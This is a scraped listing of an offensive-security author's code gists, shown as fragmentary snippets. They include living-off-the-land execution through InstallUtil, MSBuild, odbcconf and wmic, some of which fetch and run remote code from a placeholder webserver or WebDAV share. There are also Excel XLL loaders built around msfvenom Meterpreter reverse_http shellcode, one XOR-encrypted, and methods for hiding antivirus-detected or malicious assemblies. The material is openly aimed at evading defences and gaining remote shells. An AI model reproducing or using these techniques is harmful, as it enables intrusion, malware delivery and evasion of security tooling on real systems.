Arno0x / installUtil.cs
Created Sep 26, 2017
Example of a C# DLL to be used with the InstallUtil utility to make it execute some arbitrary code
View installUtil.cs
Author: Arno0x0x, Twitter: @Arno0x0x
===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs
===================================== USAGE =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll
Arno0x / msbuild.xml
Created Nov 17, 2017
MSBuild project definition to execute arbitrary code from msbuild.exe
View msbuild.xml
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
<Target Name="Hello">
<SharpLauncher >
Arno0x / TestAssembly.cs
Last active Aug 6, 2019
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
View TestAssembly.cs
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
using System.Windows.Forms;
namespace TestNamespace
View shellcode_ExcelRegisterXLL.c
// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
#include <Windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
unsigned char b[] =
View shellcode_multibyteXOR_ExcelRegisterXLL.c
// Compile with:
// cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
// C/CPP code obtained like this:
// 1. Get a raw meterpreter shellcode:
// msfvenom -a x86 -p windows/meterpreter/reverse_http LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
// 2. Encrypt it with a custom multibyte XOR string (
// ./ -cpp met_rev_winhttp_x86.raw testkey xor
#include <Windows.h>
Arno0x / detected.cs
Last active Aug 1, 2019
Hiding an AV detected assembly into another one
View detected.cs
Author: Arno0x0x, Twitter: @Arno0x0x
===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:detected.exe detected.cs
using System.Diagnostics;
using System.Runtime.InteropServices;
Arno0x / wmic.xsl
Created Apr 18, 2018
Oneliner for arbitrary code download and execution
View wmic.xsl
<?xml version='1.0'?>
<!-- Discovered by @SubTee and @mattifestation -->
<!-- Execute with: wmic os get /format:"https://webserver/wmic.xsl" -->
xmlns="" xmlns:ms="urn:schemas-microsoft-com:xslt"
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
Arno0x /
Last active Jul 15, 2019
Performs multiple useful transformations on files
# -*- coding: utf8 -*-
# Author: Arno0x0x, Twitter: @Arno0x0x
import argparse
from Crypto.Cipher import AES
import pyscrypt
from base64 import b64encode
Arno0x / odbcconf.cs
Created Nov 22, 2017
Download and execute arbitrary code with odbcconf.exe
View odbcconf.cs
To use with odbcconf.exe:
odbcconf /S /A {REGSVR odbcconf.dll}
or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
using System;
Arno0x / malicious.cs
Last active Jun 25, 2019
Hide malicious assembly in another one with RunTime code compiling
View malicious.cs
Author: Arno0x0x, Twitter: @Arno0x0x
Encode this source in base64:
base64 -w0 malicious.cs > malicious.b64
Then paste it in the code in "not_detected.cs" source file